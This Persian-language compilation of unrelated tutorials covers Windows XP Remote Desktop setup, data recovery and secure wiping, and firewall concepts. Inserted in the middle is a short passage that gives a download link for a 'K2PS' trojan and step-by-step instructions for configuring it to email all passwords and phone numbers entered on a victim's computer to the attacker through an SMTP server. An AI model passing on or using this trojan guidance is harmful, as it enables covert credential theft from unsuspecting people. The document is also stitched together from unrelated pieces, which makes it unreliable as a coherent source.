آیا تا به حال به این فکر افتاده اید که چگونه می توانید از منزل و از راه دور سیستم محل شرکت و یا اداره خود را به نحوی Remote کنید که حتی صفحه دسک تاپ آن را به همان شکل و شمایل بر روی سیستم خود داشته باشید .به عبارت دیگر آیا می توان به نحوی از تمامی امکانات آن سیستم بهره برده و به راحتی برنامه های آن را از راه دور اجرا کنید و بر روی سیستم خود ملاحظه کنید. شرکت مایکروسافت با قراردادن برنامهRemote Desktop در نسخه Xp Profesional خود این امکان را برای کاربران فراهم ساخته تا از راه دور به کامپیوتری در محل دیگر دسترسی یابند .از طریق این ویژگی می توانید از منزل به کامپیوتر محل کارتان مرتبط شوید و به تمام برنامه ها ، فایلها و منابع موجود در شبکه محل کارتان ، دسترسی یابید . حتی می توانید محیط دسک تاپ سیستم محل کارتان را عینا در کامپیوتر راه دور اجرا نمائید .
در واقع شیوه کار این برنامه به نحوی است که به محض برقراری ارتباط ، سیستم راه دور بطور اتوماتیک Lock می شود و مادامیکه به آن مرتبط هستید هیچ شخص دیگری نمی تواند به برنامه ها ، فایلها و سایر منابع آن دسترسی داشته باشد و هنگامیکه به محل کارتان بازگردید می توانید آن را با فشار دادن کلید های CTRL+ALT+DEL از حالت Lock خارج نمائید .
از دیگر ویژگی های این برنامه امکان login در یک زمان بر روی چند سیستم می باشد - حتی در حالتی که دیگران نیز به آن سیستم Log in کرده باشند- و کاربر می تواند برنامه های آنها را بطور همزمان اجرا کند.
برای دسترسی به امکانات و اجرای این برنامه باید موارد زیر را در نظر داشته باشید :
- یک کامپیوتر که در آن ویندوز Xp Profesional نصب شده و دسترسی به محیط اینترنت و یا شبکه را دارد .
- یک کامپیوتر دیگر در منزل و یا در همان محل شرکت (که از طریق شبکه داخلی با هم مرتبط هستند) با امکان دسترسی به اینترنت ، مودم
- نام کاربری ، کلمه رمز عبور و مجوزهای مناسب
برپایی سیستم Remote Desktop :
1- به Control Panel وارد شده و سپس گزینه System را انتخاب کنید .
2- در برچسب Remote ، گزینه Allow users to connect remotely to this computer را که در پائین پنجره قرار دارد انتخاب نمائید .
3- در محیط Remote Desktop ، گزینه Select Remote Users ... را کلیک کنید .
4- در کادر محاوره ای Remote Desktop Users گزینه Add… را انتخاب نمائید.
5- در کادر محاوره ای Select Users گزینه Locations … را برای تعیین موقعیت جستجو کلیک نمائید .
6- برای تعیین نوع آبجکتها ی مورد نظرتان نیز گزینه Object Types… را کلیک نمائید .
7- هنکامی که نام مورد نظرتان را یافتید ان را انتخاب کرده و سپس Ok را کلیک نمائید .در این مرحله نام مورد نظر شما در لیست کاربران Remote Desktop قرار می گیرد.
در این مرحله سیستم مزبور آماده برقراری ارتباط از راه دور می باشد. بدین منظور:
1- از منوی Start گزینهPrograms و سپس گزینه Accessorise را انتخاب کرده و از قسمت Communications نیز گزینه Remote Desktop Connection را انتخاب کنید.
2- در این مرحله پنجره Remote Desktop Connection نمایان می شود .
3- گزینه Options را انتخاب کنید تا امکان تعیین گزینه های بیشتری برای تان فراهم شود.
4- از قسمت Computer و از منوی پائین افتادنی آن نام کامپیوتر مورنظر تان را انتخاب کنید .و یا گزینه browse more for… را برای دسترسی به نام کامپیوتر های دیگر انتخاب کنید .
5- در کادر های user name و password و domain به ترتیب شناسه یا نام کاربری ، رمز عبور و نام domain مربوط به شبکه را وارد کنید.
6- سپس برای برقراری ارتباط گزینه Connect را انتخاب کنید .
اطلاعاتی که بر روی کامپیوتر توسط عواملی مانند صدمات سخت افزاری، پاک کردن و فرمت کردن از بین می روند، لزوماً غیر قابل دسترس محسوب نمی شوند. غیر قابل دسترس بودن اطلاعات بدین معناست که سیستم عامل دیگر به آنها دسترسی ندارد. در چنین حالتی، اغلبِ آنها را می شود با برنامه های خاص و سرویس های پیشرفتة بازیافت اطلاعات دوباره برگرداند. هزینة بازیافت این اطلاعات، بسته به میزان خسارت وارد شده متفاوت است.
به عنوان مثال، تصور کنید که یک Laptop 3 روز در یک نهر آب قرار گرفته، یا حریق، همة کامپیوترها و Raid-System ها را سوزانده و آب کرده است، هارد با سر و صدای زیادی که از خود تولید می کند، از Head-Crash کردن خود خبر می دهد، ویروسی اطلاعات را پاک، Master Boot Record را نابود یا باعث بروز اشتباه در فایل سیستم می شود. حتی خود Clean-Up-Utility بعضی اوقات فایل های مهم را از هم جدا می کند. گاهی هم خود کاربران وقتی که در حالتهای عصبی قرار می گیرند، پارتیشنی را به اشتباه فرمت یا دایرکتوری را پاک می کنند. تحقیقات نشان می دهند که صدمات سخت افزاری با 44% بیشترین سهم را در پاک شدن و گم شدن اطلاعات دارند. سایر علتها به ترتیب عبارتند از: 32% به کار گیری فرامین اشتباه توسط کاربر، 14% خطاهای برنامه و 7% ویروس های کامپیوتری. هنگام بروز چنین مشکلاتی اغلب کاربران موضوع را تمام شده فرض کرده و تسلیم آن می شوند. زیرا تصور می کنند که این اطلاعات، دیگر از دست رفته است. اما واقعیت، چیز دیگری است.
اگر فقط اشتباهات منطقی در ابزار ذخیرة اطلاعات ( شامل هارد، دیسکت، CD و ... ) به وجود بیاید، حتی خود شخص در این زمینه می تواند با نرم افزارهای مناسبی اطلاعات از دست رفته را دوباره بازیافت کند. کاربرانی که فایل، دایرکتوری یا پارتیشن هایی را به اشتباه پاک می کنند یا ابزار ذخیرة اطلاعات را دوباره فرمت می کنند، در واقع به خود اطلاعات ضربه نمی زنند. با اینکه اطلاعات، برای سیستم عامل و سرپرستی File System دیگر وجود خارجی ندارند، اما در واقع هنوز روی این ابزار ضبط اطلاعات قرار دارند و به راحتی و به طور کامل توسط Recovery-Utility قابل بازیافت هستند. بنابراین، نباید ابزار ضبط اطلاعات دور انداخته شود. CD-Rom های سوخته یا غیر قابل خوانده شدن هم نباید توسط کاربران دور انداخته شوند. به کمک برنامه های بازیافت اطلاعات، این اطلاعاتِ غیر قابل دسترس برای شخص دیگری قابل دسترس خواهند شد. بنابراین، کسی که این ابزار ضبط اطلاعات را دور بیندازد، در قبال قرار گرفتن این اطلاعات در دست شخص دیگری مسئول خواهد بود. قبل از اینکه عملیات نجات اطلاعات انجام شود، موارد زیر باید مدنظر قرار بگیرد. اگر مشخص نیست که چه نوع صدمه ای باعث عدم دسترسی به اطلاعات شده است، کاربران باید خیلی مواظب باشند. زیرا که ممکن است هنگام Restart کامپیوتر، سیستم، به واسطة ایجاد فایل های موقتی در سکتورهایی که اشتباهاً کامپیوتر آنها را به صورت خالی فرض کرده، اطلاعات مهم را روی آن Overwrite کند؛ اطلاعاتی که بعداً به سختی قابل بازیافت خواهند بود. همچنین هنگام راه اندازی مجدد سخت افزار مثلاً هارد، این امکان وجود دارد که حرکت هد خواننده و نویسندة اطلاعات باعث، گم شدن گسترده تر اطلاعات شود. اصولاً هنگام بروز خطاهای فیزیکی هارد مانند Crash کردن هد، توصیه نمی شود که شخصاً اقدام کنید. اگر این خطا تنها در ارتباط با خطاهای منطقی باشد، برنامه های بازیافت و نجات اطلاعات از هزینة بالای بازیافت آن در آزمایشگاهها جلوگیری می کند. ویروسها و موارد دیگر اگر یک ویروس Master Boot Record یا(File Allocation able) FAT را تخریب کند، هارد اطلاعات را دیگر نمی تواند بخواند، اما خللی در ماهیت واقعی آنها داده نمی شود. چنین اطلاعاتی شبیه کتابی است که شماره صفحه و فهرست ندارد و صفحات آن در هم و برهم است. یعنی همة کتاب موجود است، ولی چون نظم ندارد، عملاً غیر قابل استفاده است. کسی که پس از پدیدار شدن خطای منطقی، نرم افزاری را دوباره نصب می کند، خطر Overwrite شدن روی اطلاعات قدیمی را افزایش می دهد. در چنین حالتی، یا نجات اطلاعات بسیار مشکل می شود یا اینکه فقط به کمک افراد متخصص در Recovery-Labor ها امکان پذیر می شود. ابزارهای متعددی برای استفاده کاربران جهت بازیافت اطلاعات وجود دارند. این ابزارها، بسته به نوع برنامه، هم برای سیستم Dos وجود دارد و هم برای سیستم های وینــدوز 95 ، 98 ، Me ، NT و 2000 . R-Studio از ســری ابــزارهای R-Tool و File Recovery For Windows از سری تکنولوژی LC در حال حاضر برای ویندوز XP ارائه می شوند. اصولاً امکان نجات اطلاعات بر روی دیسکت، هارد و نوارهای مغناطیسی به صورت محلی و از طریق شبکه با استفاده از اتصالات TCP/IP امکان پذیر است. علاوه بر این، برای محدوده های شبکه، راهکار خاصی وجود دارد، مانند Stellar Phoenix برای Novell Netware . محصولاتی مانند File recovery For Windows ، سیستم های Raid و Soft-Raid را نیز پشتیبانی می کند. همچنین دارندگان دوربین های دیجیتالی به کمک آن می توانند اطلاعات پاک شده خود را تحت هر شرایطی بازیافت کنند، چون این تسهیلات نیز برای جایگزاری با Smart Media ، Compact Flash و Memory Sticks مناسب است. فرمت به کار رفتة فایل سیستم، نقش تعیین کننده ای برای بازیافت اطلاعات ندارد. برای هر فرمت به کار رفته تحت ویندوز مانند NTFS,FAT32,FAT16,Fat12 و NTFS5 یک ابزار بازیافت مناسب وجود دارد. در همان حال که File Scavanger جهت نجات فایل های پاک شده تحت NTFS به کار می رود، Easy Recovery 5.1 Professional تمامی فرمت ها را پشتیبانی می کند و مزیت آن، به شرطی که فرمت فایل سیستمی که در آن اطلاعات بازیافت شونده قرار دارند، مشخص باشد، سرعت بالای آن در بازیافت اطلاعات است. به علاوه Easy Recovery بازیافت در Raw-Modus را نیز امکان پذیر می سازد. در این حال به همه واحدهای فایل ها، یک شماره ویژه به عنوان اسم اختصاص داده می شود این شماره، پیدا کردن فایل های مشخص را مشکل تر می کند. اما این برنامه شاخص های فایل ها (Extension) را نزد خود نگه می دارد.
بازیافت فایل های خراب Office
اغلب ابزارهای بازیافت مانند Final Data Enterprise ، اطلاعات را بدون توجه به فرمت فایل کنونی آنها دوباره بازیافت می کند. R-Studio همچنین فایل های فشرده و کدگذاری شده را بازیافت می کند. محتوای برنامه Office-Recovery-Suite 2.0 Professional عبارت است از قراردادن یک ردیف از Add ها برای کاربردهای Excel , Access , Microsoft-Office Word و PowerPoint . این نرم افزار پس از نصب، با فرمان Recover یک عملکرد بازیافت را در منوی File برنامه Office کنونی اجرا می کند. پس از فعال کردن دستور، کاربر فایلی را که به عنوان مثال به واسطة حملة ویروسی، فروپاشی سیستم یا دستور اشتباه، آسیب دیده است، انتخاب و روی Open کلیک می کند.پس از آن، فایل هایی، که اغلب آنها را اطلاعات فرسوده شده و بازیافت شده تشکیل می دهد، به خاطر مسائل حفاظتی در یک Document جدید نگهداری می شوند. به این ترتیب، این برنامه به فایل های مرجع خراب دوباره آسیب نمی زند. تحت Excel می شود بر حسب میزان خرابی فایل، تحت شرایطی ساختارهای جداول چند منظوره به همراه متن ها، مرجع ها، فرمت ها و دستورها را بازیافت کرد. از طرفی ابزارهای بازیافت برای استفاده از Office اجازه می دهند که از اطلاعات نسخه های جدید Excel تحت یک نسخة قدیمی استفاده شود. درباره عملکردهایی مثل فرمت های مشخص که فقط توسط Excel 2002 پشتیبانی می شوند، کاربران باید از Excel 97 صرفنظر کنند.
بازیافت E-Mail های پاک شده برنامة Final-E-Mail یکی از برنامه هایی است که برای بازیافت E-Mail های پاک شده و زیر مجموعه های آن شامل Sent , Draft , Folder Inbox یا Trash طراحی و ساخته شده است. تک تک فایل های .EML به همان اندازة فایل های .DBX و فرمت Folder های .DBX و .MBX که مورد استفادة Outlook Express , Outlook و Eudora-Mail قرار می گیرد، قابل بازیافت هستند. همچنین برنامة Netscape Mail نیز پشتیبانی می شود. پس از استارت Final-Data که برنامه Final-E-Mail را نیز شامل می شود، اول باید درایوی که E-Mail های گم شده در آن قرار دارند، انتخاب شود. از طریق منوی File به فرمان Find دسترسی می یابید. پس از آن باید شاخص فایلِ به کار رفته، مثلاً .DBX وارد شود و با اجرای دستور Find عملیات جستجو فعال شود. سپس این برنامه همة فایل های .DBX را لیست می کند. Final-Data پس از نشان زدن فایل Outlook.dbx و انتخاب دستور Recover E-Mail File از طریق منوی Repair ، تک تک قسمتها شامل فرستنده، موضوع، اندازه و تاریخ فایل را لیست می کند. اکنون E-Mail ها با اجرای دستور Recover توسط شخص قابل بازیافت است. همة این کارها تا زمانی عمل می کند که اطلاعات جدید روی فایل های پاک شده قبلی جایگزین نشوند.
کمک های پیشرفته و حرفه ای از آنجا که امکان بازیافت هر فایل آسیب دیده ای وجود ندارد، قیمتهای بین 35 تا 1000 دلار آمریکا برای برنامه های نجات اطلاعات، کمی قابل تامل است. به همین خاطر، اغلب تولید کنندگان این برنامه ها، نسخه های آزمایشی این برنامه ها را جهت Download در اینترنت ارائه می کنند. اما این برنامه ها خیلی محدود هستند. برای مثال، به واسطة استفاده از این برنامه ها فقط نجات فایل هایی با حجم 4 ، 10 یا 15 کیلو بایت میسر است، ولی این برنامه ها مشخص می کنند که چه فایل هایی تحت چه شرایطی قابل بازیافت هستند. نسخه های رایگان Ontrack ، ابزارهای ضبط اطلاعات را تحلیل می کنند، فایل هایی را که با نسخة کامل قابل بازیافت می باشند، تست می کنند و به یک فایل اجازة بازیافت می دهند. اگر خود محدودة اطلاعات آسیب دیده باشد، مثلاً به واسطة Overwrite یا خطاهای سخت افزاری مثل Crash هارد، آن وقت نجات اطلاعات در محلهای مورد نظر غیر ممکن است، ولی در اطراف قسمت آسیب دیده، سکتورهای سالم زیادی وجود دارد. در اتاقهای مخصوص در آزمایشگاههای Ontrack , Vogan یا Ibas برای متخصصان این امکان وجود دارد که اطلاعات درست را بازیافت کنند، بویژه در مورد کامپیوترهایی که مدت زمان طولانی در آب دریا قرار گرفته باشند یا در آتش سوزی سوخته باشند ( صفحة هارد از کبالت و نیکل ساخته شده و تا دمای 700 درجه سانتیگراد تحمل دارد. در چنین حرارتی فقط مشتی خاکستر از خانه باقی خواهد ماند.) برای آنالیز صفحات هارد، متخصصان Ibas از یک دستگاه ساخته شده به نام Pattern Analyzer استفاده می کنند. آنها توسط این دستگاه صفحات هارد را باز می کنند و به آن حرکت دورانی می دهند که کنترل شده نیز باشد. بدین ترتیب، عمل خواندن محدوده های کوچک و غیر آسیب دیده صفحة هارد امکان پذیر می شود. هد خواننده را که توسط دست قابل هدایت است و از طریق سیگنال های یک اسیلوگراف در مدار قرار می گیرد، می توان در مکان و موقعیت مورد نظر قرار داد. در محلهای خوانده شده روی هارد در قسمت هد خواننده، به خاطر مغناطیس موجود جریان الکتریسیته ایجاد می شود و در نتیجه، سیگنال های آنالوگ حاصل می شود. یک دستگاه الکترونیکی این سیگنال های آنالوگ را اندازه گیری و آنها را به اطلاعات دیجیتالی تبدیل می کند. به این ترتیب، علائم، فایل ها یا کلیه ساختارهای فهرست شده می توانند بازیافت شوند. در حال حاضر، نجات اطلاعات در حالتهای شدید هزینة بالایی دارد. قبل از هر کاری، آنالیز اطلاعات آسیب دیده مطرح است. هم اکنون، فرایند بازیافت اطلاعات برای یک هارد نرمال توسط شرکت Ontrack و Ibas 450 مارک هزینه در بر دارد. با این حال، شرکت Ibas اگر در روند بازیافت اطلاعات موفق شود، هزینه را از شخص دریافت می کند. این کار شاید برحسب نوع اطلاعات به بیش از دهها هزار مارک بالغ شود.
پاک کردن مطمئن اطلاعات گاهی اوقات، پاک کردن اطلاعات یک هارد به صورت غیر قابل بازیافت، مهم است برای مثال، زمانی که بخواهید کامپیوتر خود را به شخص دیگری بفروشید. پاک کردن معمولی یا فرمت کردن، همان طور که توضیح داده شد، از بازیافت مجدد آنها جلوگیری نمی کند. همچنین بکارگیری یک Degausser همیشه تخریب کامل را به همراه خواهد داشت؛ تا آنجا که هارد، غیر قابل استفاده می شود. برای پاک کردن همة آثار و علائم از روی هارد، ابزارهای خاصی لازم است که همة اطلاعات هارد را به صورت فیزیکی پاک کند، ولی در عین حال به هارد ضربه نزند. برای مثال Ibas با ابزار Expert Eraser چنین نرم افزاری را ارائه می دهد. این برنامه که براساس سیستم عامل Dos کار می کند، مستقل از Bios و سیستم عامل، به واسطة دیسکت عمل می کند و با هر کامپیوتر سازگار با IBM با پروسسور 386 به بالا و 640 کیلو بایت RAM کار می کند. برنامه Expert Eraser هاردهای IDE و SCSI را به صورت اتوماتیک می شناسد. پس از نصب این برنامه، هارد به صورت غیر قابل برگشت پاک می شود و حتی متخصصان در آزمایشگاه در این حالت نیز هیچ اطلاعاتی را نمی توانند بازیافت کنند. اقدامات پیشگیری کننده برای اینکه کاربران در وضعیت اضطرار قرار نگیرند که مجبور بشوند اطلاعات خود را دوباره بازیافت کنند، باید به نکات زیر توجه کرد. · اطلاعات مهم باید همیشه حفاظت بشوند؛ به همین دلیل باید از آنها Backup تهیه کرد. همچنین توصیه می شود که دوباره ذخیره شوند، مثلاً به روش دیگر یا در جای دیگری در کامپیوتر ضبط شوند. توجه کنید که کامپیوتر را باید از تغییرات شدید آب و هوایی دور نگاه داشت. · از وارد شدن صدمه و ضربه به کامپیوتر جلوگیری به عمل آورید. ضربات کوچک، وضعیت هارد را دگرگون می کند و هد ضبط و خواننده اطلاعات را از محل اصلی خود جا به جا می کند. اگر بدنة هارد باز شود خطر Head-Crash آن را تهدید می کند. با توجه به فاصله سر هد تا صفحة هارد که بین 25 تا 50 نانومتر است، اثر انگشت یا حتی غبار هوا باعث Crash کردن آن می شود. · فایل های مهم به هیچ وجه نباید در دایرکتوری Root یا روی ابزارهای ضبطی که پر هستند ذخیره شوند. در این حالت، بزرگترین خطر این است که ویندوز اطلاعات آسیب دیده را با فایل های موقتی Overwrite کند. · اگر واضح نیست که کدام نوع خطا باعث گم شدن اطلاعات شده است، یا سر و صداهای غیر معمول خبر از مشکلات سخت افزاری می دهد، کاربران نباید خود وارد عمل شوند. در چنین حالتی Restart می تواند باعث گسترش مکانهای آسیب دیده شود و این موضوع باعث از دست رفتن اطلاعاتی می شود که البته قابل بازیافت هستند. · اطلاعات آسیب دیده نباید مستقیم مورد استفاده قرار بگیرند و دسترسی فقط از طریق یک ابزار ضبط اطلاعاتِ دیگر، موفقیت آمیز است. اطلاعاتی که باید بازیافت شوند، بر روی این ابزار ضبط اطلاعات قرار می گیرند و به هیچ وجه روی ابزار ضبط اطلاعات خراب که عمل پاک شدن روی آن واقع شده، قرار نمی گیرند. · اگر انجام عملیات موفقیت آمیز نجات اطلاعات، هدف است، عمل Defragment بسیار مؤثر خواهد بود. اطلاعاتی که Defrag شده اند، نسبت به اطلاعاتی که به صورت پراکنده روی هارد ضبط شده اند، آسانتر و سریعتر قابل بازیافت هستند.
این تروجان تمام پسورد ها و شماره تلفن های وارد شده در سیستم قربانی را برای شما میل می کند ! طرز کار آن هم خیلی ساده است . اول برنامه را از لینک http://www.sharemation.com/tnt7/booters/K2PS034.zip دانلود کنید و از حالت زیپ خارجش کنید فایل K2pS_setup را اجرا کنید .دکمه open را بزنید . حال یکی از فایلهای کناری این برنامه را انتخاب کنید و open را بزنید ... فایل اولی که K2pS است تمام یوزر پسورد ها و شماره ها را برای شما هر زمان که قربانی به اینترنت وصل شود برای شما فرستاده می شود و دومی که K2pS_full است همان کار را می کند با این تفاوت که دیگر پسورد های تکراری را برای شما نمی فرستد !
حالا بعد از انتخاب سرور .. در قسمت smtp srver : باید آدرس سرور میل را وارد کنید (که چندتا میل سرور را برای شما اخر می نویسم) و در قسمت destination adress ایمیلی که باید اطلا عات به آن فرستاده شود (ایمیل خود شما)
در قسمت source address هم اسم قربانی یا هر چی که دوست دارید وارد کنید و بعد دکمه save را بزنید .. سرور شما آماده است توجه کنید که فایلی را ایجاد نمی کند در واقع فایل سروری که انتخاب کردید را ویرایش می کند .. پس فایل سرور همان فایلی است که open کردید ... .
دیوارههای آتش یکی از مؤثرترین و مهمترین روشهای پیاده سازی "مصونیت شبکه" هستند و قادرند تا حد زیادی از دسترسی غیر مجاز دنیای بیرون به منابع داخلی جلوگیری کنند.دیوارههای آتش، مانند خندقهای دور قلعههای دوران قرون وسطی عمل میکنند. شکل 1 یکی از این قلعهها را نشان میدهد. خندق دور قلعه باعث میشود نفوذ به قلعه مشکل باشد.
انجمن Network Computer Security Association) NCSA) تعریف زیر را از دیوارههای آتش ارائه داده است."دیواره آتش یک سیستم یا ترکیبی از چندین سیستم است که یک سری محدودیت را بین دو یا چند شبکه اعمال میکند."در واقع یک دیواره آتش با محدودکردن دسترسی بین دو شبکه سعی میکند یکی را از دیگری محافظت کند. عموماً دیوارههای آتش به منظور محافظت شبکه خصوصی که به یک شبکه عمومی یا مشترک متصل است به کار گرفته میشوند. دیوارههای آتش یک نقطه محدود کننده را بین دو شبکه ایجاد میکند.
عملکرد دیوارههای آتش را میتوان در سه جمله خلاصه کرد:
- آنها افراد را موقع ورود در یک نقطه کاملاً کنترل شده محدود میسازد.
- آنها از نزدیک شدن خرابکاران به منابع داخلی جلوگیری میکنند.
- آنها افراد را موقع خروج در یک نقطه کاملاً کنترل شده محدود میسازند.
در واقع این نقطه کاملاً کنترل شده در مثال قلعههای قرون وسطایی همان پل متحرکی است که تنها در مواقع ورود و خروج افراد مشخص بر روی خندق قرار میگیرد و در دیگر موارد بسته است و در نقش درب قلعه عمل میکند. دیواره آتش اغلب در نقطهای که شبکه داخلی به شبکه خارجی متصل است قرار داده میشود (شکل 2). تمام ترافیکی که از سمت شبکه خارجی به شبکه داخلی وارد میشود و یا از شبکه داخلی به سمت شبکه خارجی، خارج میشود از دیواره آتش عبور میکند، به همین علت دیواره آتش فرصت و موقعیت مناسبی را داراست که تشخیص دهد آیا ترافیک عبوری مورد پذیرش هست یا خیر. اینکه چه ترافیکی مورد پذیرش هست به "سیاست امنیتی" (Security Policy)شبکه باز میگردد. سیاستهای امنیتی تعیین میکنند که چه نوع ترافیکهایی مجوز ورود و یا خروج را دارا هستند.
میتوان گفت یک دیواره آتش:
- یک جداساز است.
- یک محدودساز (Restrictor) است.
- یک آنالیزکننده (Analyzer) است.
یک دیواره آتش ممکن است:
- مسیریابی با چند لیست کنترل دسترسی باشد.
- نرم افزاری که روی یک PC یا یک سیستم Unix اجرا می شود، باشد.
- یک جعبه سخت افزاری اختصاصی باشد.
انواع پیچیده تر دیواره های آتش به صورت ترکیبی از چندین سیستم و راه حلهای Multi-computer و Multi-router پیاده سازی میشوند. شبکه های مختلف بسته به نیازهای امنیتی مختلف و هزینه ای که برای تأمین امنیت در نظر گرفته اند از دیوارههای آتش مختلف و روشهای پیاده سازی مختلف آنها استفاده میکنند.
دیوارههای آتش اگر چه که از بروز مشکلات مختلف برای شبکه داخلی جلوگیری میکنند اما بدون اشکال و عیب نیستند. در مثال ذکر شده، افراد ماهرتر قادر خواهند بود از خندق با شنا عبور کنند و در یک فرصت مناسب هنگامی که پل باز است با لباس مبدل به قلعه وارد شوند. سؤال اینجاست که با وجود این اشکالات چرا دیوارههای آتش مورد استفاده قرار میگیرند؟ در پاسخ باید گفت درست است که در حالات خاصی دیواره آتش نفوذ پذیر است و خرابکاران قادرند از آن عبور کنند، اما با این حال این ابزار از عبور بسیاری از خرابکاران جلوگیری میکند و موثرترین ابزار در کنترل دسترسی به شبکه به حساب میآید. در صورتی که هیچ خندقی وجود نداشته باشد ورود افراد غیر مجاز به قلعه بسیار آسانتر خواهد بود و آیا چون در حالات خاصی، افراد خاص ممکن است از خندق عبور کنند، هیچ خندقی وجود نداشته باشد؟
در هر حال یک دیواره آتش قادر است در جهت بالا رفتن سطح امنیتی شبکه اقدامات مفیدی را انجام دهد. در ادامه مواردی که یک دیواره آتش قادر است انجام دهد و به امنیت شبکه کمک کند را مورد بررسی قرار میدهیم.
تواناییهای دیوارههای آتش در این بخش تواناییهای دیوارههای آتش را مورد بررسی قرار میدهیم.
یک دیواره آتش میتواند اجرای تصمیمات امنیتی را در یک نقطه متمرکزکند: همانطورکهگفته شد، دیواره آتش یک نقطه محدود کننده بین دو شبکه است. تمام ترافیک به داخل و از خارج باید از این نقطه باریک عبورکند و راه دیگری برای عبور ترافیک وجود ندارد. بدین ترتیب دیواره آتش قابلیت اعمال کنترل شدیدی را دارا خواهد بود و میتواند با اعمال ابزار مختلف تأمینکننده امنیت در این نقطه سطح قابل قبولی از امنیت را تضمین کند. در واقع چون همه چیز در یک کانال ارتباطی قابل کنترل است میتوان تصمیمات مختلفی را در ارتباط با امنیت شبکه گرفت و به اجرا در آوردن آنها را در یک نقطه متمرکز ساخت.
یک دیواره آتش میتواند سیاست امنیتی شبکه را به اجرا در آورد: میدانیم سرویسهای مختلفی در شبکهها وجود دارند و با گسترش اینترنت تنوع و تعداد آنها بسیار افزایش یافته است. اغلب این سرویسها ناامن هستند و هنگام استفاده و ارائه آنها باید دقت کرد. سیاست امنیتی شبکههای مختلف تعیین میکند که چه سرویسهایی در شبکه ارائه میشود و چه افرادی مجازند از این سرویسها استفاده کنند. دیوارههای آتش قادرند با پاسبانی و کنترل سرویسهای مختلف تنها به سرویسهای مجاز تعریف شده در سیاست امنیتی اجازه عبور دهند و بدین ترتیب سیاست امنیتی شبکه را به اجرا درآورند. سیاستهای امنیتی نهایتاً به تعدادی قوانین اجرایی تبدیل میشوند که دیوارههای آتش قادر خواهند بود تعداد زیادی از آنها را اجرا کنند. دیوارههای آتش ممکن است سرویسهای خطرناک و ناامن و را با اعمال محدویت تنها در شبکه داخلی اجازه دهند.
سیاستهای امنیتی مختلفی قابل اتخاذ هستند. مدیران یک شبکه ممکن است تنها به یک سیستم داخلی اجازه دهند. با دنیای بیرون در ارتباط باشد، در این صورت دیواره آتش تنها ترافیک متعلق به آن سیستم را از خود عبور خواهد داد.
ذکر این نکته ضروری است که پیادهسازیهای مختلف از دیوارههای آتش تواناییهای متفاوت در به اجرا در آوردن سیاستهای امنیتی دارند و بنابراین با استفاده از برخی از دیوارههای آتش ممکن است نتوان برخی از سیاستها را به اجرا در آورد.
یک دیواره آتش میتواند فعالیتهای مهم را ثبت کند: به این علت که تمام ترافیک از دیواره آتش عبور میکند، دیواره آتش یک مکان مناسب برای ثبت مجموعههای مختلف از فعالیتهاست. به عنوان تنها نقطه دسترسی، دیواره آتش میتواند ثبت کند که چه اتفاقاتی بین شبکه محافظت شده و شبکه بیرونی رخ میدهند. با دسته بندی این اطلاعات میتوان به نتایج خوبی در ارتباط با استفاده از شبکه، تهاجمهای در حال شکلگیری، مزاحمان و متخلفان داخلی و خارجی و.... دست یافت.
یک دیواره آتش قادر است سطوح مختلفی از امنیت را برای بخشهای مختلف پیادهسازی کند: از دیوارههای آتش گاهی برای جدا نگه داشتن یک بخش از بخشهای دیگر استفاده میشود. این حالت زمانی اتفاق میافتد که یک بخش از شبکه بیشتر از بخشهای دیگرحساس باشد و نیازمند امنیت بیشتری باشد. بدین ترتیب با استفاده از دیوارههای آتش میتوان بخشهای مختلف با سطوح امنیتی مختلف را ایجاد نمود. این مسأله باعث میشود بروز مشکلات امنیتی نتواند تمام سرتاسر شبکه را تحت تأثیر قرار دهد و برخی بخشهای مهمتر و حساستر مصون بمانند. دیوارههای آتش در مجموع قادرند شبکه را در برابر تهدیدات مختلف تا حد زیادی مورد محافظت قرار دهند، اما آنها راه حل امنیتی کامل و بدون عیبی نیستند. برخی از خطرات و مشکلات از کنترل دیواره آتش خارج هستند و برای مقابله با آنها باید از روشهایی مانند ایجاد مکانیزمهای قوی امنیت فیزیکی، " مصونیت میزبان" و آموزش کاربران و مدیران و... استفاده کرد.
ناتوانیهای دیوارههای آتش در ادامه برخی از ناتوانیهای دیوارههای آتش را مورد بررسی قرار میدهیم:
یک دیواره آتش نمیتواند شبکه و منابع آن را از خرابکاران داخلی محافظتکند: دیواره آتش ممکن است بتواند از اینکه اطلاعات مفید سازمان از طریق خط ارتباطی شبکه به بیرون انتقال یابند جلوگیری کند اما هنگامی که این اطلاعات از خط ارتباطی عبور نمیکنند نمیتواند هیچکاری انجام دهد. کاربری ممکن است با استفاده از یک دیسک، Floppy، CD و یا تعدادی ورقه که آنها را در کیفش قرار میدهد اطلاعات حساس سازمان را به بیرون انتقال دهد. در مقابله با این نوع کاربران (که ممکن است اطلاعات داخل را عمداً و یا سهواً از روی غفلت افشا کنند)، دیوارههای آتش ناتوان هستند و هیچکاری از دستشان ساخته نیست. برخی از افراد داخلی سطوح دسترسی بالایی را در شبکه دارا هستند و مجازند به منابع مختلف در شبکه دسترسی داشته باشند، این افراد قادر خواهند بود سخت افزارها را خراب کنند، نرم افزارها و برنامههای مختلف را دچار مشکلکنند، به طور ماهرانهای برنامهها را تغییردهند، سطوح دسترسیها را دستکاری کنند و.... واقعیت این است که دیوارههای آتش در مقابله با این مشکلات کاری نمیتوانند انجام دهند.
یک دیواره آتش نمیتواند از بروز تمام مشکلات امنیتی جلوگیریکند: دیواره آتش برای مقابله با خطرات شناخته شده طراحی شده است. مدیران شبکه با شناختی که از حملات و خطرات مختلف دارند و با تصویب تعدادی قوانین و اجرای آنها توسط دیواره آتش سعی میکنند از بروز آنها جلوگیری کنند، اما واقعیت این است که روز به روز حملات و مشکلات امنیتی جدیدی به وجود میآیند و دیواره آتش نمیتواند به طور خودکار با این خطرات مقابله کند. دیواره آتش نیز مانند تجهیزات دیگر توسط مدیر سیستم پیکربندی میشود و پیرو دستوراتی است که مدیر میدهد. یک پیکربندی خوب تا حدودی قادر خواهد بود از خطرات جدید نیز جلوگیریکند. در این پیکربندی هیچ ترافیکی عبور داده نمیشود غیر از ترافیک مربوط به تعداد بسیار اندکی سرویس مطمئن. خرابکاران به طور مرتب راههای جدیدی برای نفوذ و خرابکاری پیدا میکنند. آنها یا از سرویسهای مطمئن شناخته شده سوء استفاده میکنند ویا مشکلاتی که تا کنون برای کسی رخ نداده (و بنابراین هیچ کس راجع به آنها چیزی نمیداند و به همین دلیل در هیچ دیواره آتشی در نظر گرفته نشده) را به کار میبندند. یک دیواره آتش را نمیتوان یک بار پیکربندی کرد و انتظار داشت برای همیشه شبکه را از هر خطری مورد محافظت قرار دهد.
